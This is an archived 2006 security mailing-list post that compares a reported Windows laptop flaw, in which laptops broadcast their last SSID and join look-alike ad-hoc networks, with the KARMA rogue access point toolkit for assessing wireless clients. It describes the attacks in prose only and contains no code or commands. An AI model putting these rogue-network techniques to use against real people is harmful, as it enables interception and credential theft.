Dailydave mailing list archives

Slashback!

From: Dave Aitel <dave.aitel () gmail com>
Date: Sun, 15 Jan 2006 09:49:14 -0500

How does this: http://it.slashdot.org/it/06/01/15/0815207.shtml
An anonymous reader writes *"Washingtonpost.com is reporting from the 2nd
annual Shmoocon hacker conference about the release of a previously
undocumented vulnerability in
Windows<http://blogs.washingtonpost.com/securityfix/2006/01/windows_feature.html>.
The flaw takes advantage of a feature on Windows laptops that have wireless
cards built-in. Security researcher Mark Loveless found that Windows laptops
which cannot find a wireless connection are configured to broadcast the name
of the last SSID they associated with. They assign themselves an ad-hoc
'link local' (think 169.254.x.x.) address, and an attacker can configure his
machine to broadcast an SSID of the same name. Thus, the attacker associates
with that 'network' and communicates directly with the victim's machine. The
funny part from the Post blog entry is that Microsoft helped author the RFC
for link local."*

Differ from this:

http://www.theta44.org/karma/index.html
KARMA Wireless Client Security Assessment Tools

KARMA is a set of tools for assessing the security of wireless clients at
multiple layers. Wireless sniffing tools discover clients and their
preferred/trusted networks by passively listening for 802.11 Probe Request
frames. From there, individual clients can be targetted by creating a Rogue
AP for one of their probed networks (which they may join automatically) or
using a custom driver that responds to probes and association requests for
any SSID. Higher-level fake services can then capture credentials or exploit
client-side vulnerabilities on the host.

KARMA includes patches for the Linux MADWifi driver to allow the creation of
an 802.11 Access Point that responds to any probed SSID. So if a client
looks for 'linksys', it is 'linksys' to them (even while it may be 'tmobile'
to someone else). Operating in this fashion has revealed vulnerabilities in
how Windows XP and MacOS X look for networks, so clients may join even if
their preferred networks list is empty.

Currently, these releases are BYOX (Bring Your Own Exploits), although a
number of client-side exploits have been written, tested and demonstrated
within this framework. Some may be included in a future release. Automated
agent deployment is also planned.



-dave

Current thread:

Slashback! Dave Aitel (Jan 15)
- Re: Slashback! Dino A . Dai Zovi (Jan 15)
- Re: Slashback! H D Moore (Jan 15)
  - Re: Slashback! Kurt Grutzmacher (Jan 16)
    - Re: Slashback! Mike Kershaw (Jan 17)
- Re: Slashback! Technocrat (Jan 15)
  - Re: Slashback! Alexander Bochmann (Jan 16)
    - Re: Slashback! Dino A. Dai Zovi (Jan 16)
- <Possible follow-ups>
- RE: Slashback! Taylor, Gord (Jan 16)
  - Re: Slashback! Dino A. Dai Zovi (Jan 16)
    - Re: Slashback! byte_jump (Jan 17)

(Thread continues...)